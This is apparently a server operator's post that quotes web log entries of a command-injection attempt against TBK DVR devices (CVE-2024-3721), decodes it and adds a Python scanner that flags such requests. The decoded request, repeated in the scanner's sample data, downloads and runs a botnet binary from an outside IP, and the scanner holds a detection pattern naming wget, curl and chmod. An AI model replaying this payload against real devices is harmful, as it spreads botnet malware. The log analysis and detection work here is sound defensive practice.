91.224.92.10 - - [20/Feb/2025:16:17:56 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"
91.224.92.10 - - [20/Feb/2025:16:22:58 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"
device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp;rm arm7; wget http://45.125.66.114/arm7; chmod 777 *; ./arm7 tbk
It tries to download arm7 from 45.125.66.114 in Lithuania; it looks like yet another botnet (zombie) malware. I wanted to download it manually to take a look, but my antivirus blocked it, so I couldn't be bothered to fetch the file again.
This is an attack against CVE-2024-3721, a vulnerability in the TBK DVR-4104 and DVR-4216 devices. It affects some unknown processing in the file /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX; manipulation of the mdb/mdc parameters leads to operating system command injection, and the attack can be launched remotely.
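Added here as an illustration (not part of the original post): a small log scanner that parses combined-format access log lines like the two above, URL-decodes the `mdc` parameter of requests to `/device.rsp`, and flags the ones that carry shell metacharacters, grouping attempts by source IP. The two hostile lines are taken from the post; the benign third line and the `SHELL_META` pattern are my own constructions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell separators/substitution and downloader/permission commands that have no
# legitimate place inside a DVR query parameter (constructed heuristic).
SHELL_META = re.compile(r'[;|&`$]|\b(wget|curl|tftp|chmod)\b')

# Sample input: first two lines copied from the post, third line constructed as benign traffic.
SAMPLE_LOG = [
    '91.224.92.10 - - [20/Feb/2025:16:17:56 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"',
    '91.224.92.10 - - [20/Feb/2025:16:22:58 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"',
    '10.0.0.5 - - [20/Feb/2025:16:30:00 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

def analyze(line):
    """Parse one log line; return None if it does not match the format.
    'suspicious' is True when the request targets /device.rsp with an mdb
    parameter and the decoded mdc value contains shell metacharacters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    mdc = params.get('mdc', [''])[0]
    hit = parts.path == '/device.rsp' and 'mdb' in params and bool(SHELL_META.search(mdc))
    return {'ip': rec['ip'], 'status': int(rec['status']), 'mdc': mdc, 'suspicious': hit}

def scan(lines):
    """Count suspicious /device.rsp injection attempts per source IP."""
    by_ip = {}
    for rec in map(analyze, lines):
        if rec and rec['suspicious']:
            by_ip[rec['ip']] = by_ip.get(rec['ip'], 0) + 1
    return by_ip

if __name__ == '__main__':
    for ip, n in scan(SAMPLE_LOG).items():
        print(f'{ip}: {n} injection attempt(s) against /device.rsp')
```

The 404 status shows this server does not expose the vulnerable handler, so the value of the check is in spotting the scanning source early rather than in confirming a compromise.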